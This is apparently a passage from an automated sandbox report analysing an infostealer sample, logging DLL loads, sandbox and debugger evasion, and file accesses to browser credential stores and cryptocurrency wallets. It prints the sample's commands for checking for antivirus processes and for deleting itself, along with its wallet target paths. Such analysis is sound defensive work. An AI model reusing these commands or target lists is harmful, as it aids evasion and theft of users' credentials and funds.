                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: cscapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: linkinfo.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: 9EI7wrGs4K.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: 9EI7wrGs4K.exeStatic PE information: real checksum: 0xd9d82 should be: 0xdfd9a
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B00DE6 push ecx; ret 10_2_00B00DF9

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\245347\Dry.comJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\245347\Dry.comJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B726DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_00B726DD
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00AFFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00AFFC7C
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_10-105013
                Source: Dry.com, 0000000A.00000003.1842719771.00000000015A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                Source: Dry.com, 0000000A.00000002.2459089556.0000000001638000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DLLVMCHECK.DLLDIR_WATCH.DLLAP@
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comAPI coverage: 3.7 %
                Source: C:\Windows\SysWOW64\timeout.exe TID: 6368Thread sleep count: 85 > 30Jump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B4DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00B4DC54
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B5A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00B5A087
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B5A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00B5A1E2
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B4E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_00B4E472
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B5A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00B5A570
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B566DC FindFirstFileW,FindNextFileW,FindClose,10_2_00B566DC
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B1C622 FindFirstFileExW,10_2_00B1C622
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B573D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00B573D4
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B57333 FindFirstFileW,FindClose,10_2_00B57333
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B4D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00B4D921
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00AE5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00AE5FC8
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\245347Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\245347\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: Dry.com, 0000000A.00000002.2458694756.000000000157D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B5F4FF BlockInput,10_2_00B5F4FF
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00AE338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00AE338B
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B05058 mov eax, dword ptr fs:[00000030h]10_2_00B05058
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B420AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,10_2_00B420AA
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B12992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00B12992
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B00BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00B00BAF
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B00D45 SetUnhandledExceptionFilter,10_2_00B00D45
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B00F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00B00F91

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: Dry.com PID: 7548, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B41B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00B41B4D
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00AE338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00AE338B
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B4BBED SendInput,keybd_event,10_2_00B4BBED
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B4EC9E mouse_event,10_2_00B4EC9E
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 245347Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "profiles" Organizing Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Judy + ..\Sheets + ..\Another + ..\Wanting bJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\245347\Dry.com Dry.com bJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\245347\Dry.com" & rd /s /q "C:\ProgramData\OHVS0RIMGLNY" & exitJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B414AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_00B414AE
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B41FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00B41FB0
                Source: Dry.com, 0000000A.00000000.1691722119.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp, Dry.com.1.dr, Volunteer.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Dry.comBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B00A08 cpuid 10_2_00B00A08
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B3E5F4 GetLocalTime,10_2_00B3E5F4
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B3E652 GetUserNameW,10_2_00B3E652
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B1BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,10_2_00B1BCD2
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 10.2.Dry.com.3f90000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000003.1842774905.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1842371095.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1842833283.000000000165D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2458694756.000000000157D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2459089556.0000000001638000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2461862261.0000000003F91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1842430157.00000000015C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1842551934.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1842719771.00000000015A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Dry.com PID: 7548, type: MEMORYSTR
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Electrum
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Exodus\
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: info.seco
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Exodus
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Ethereum
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: MultiDoge
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: seed.seco
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
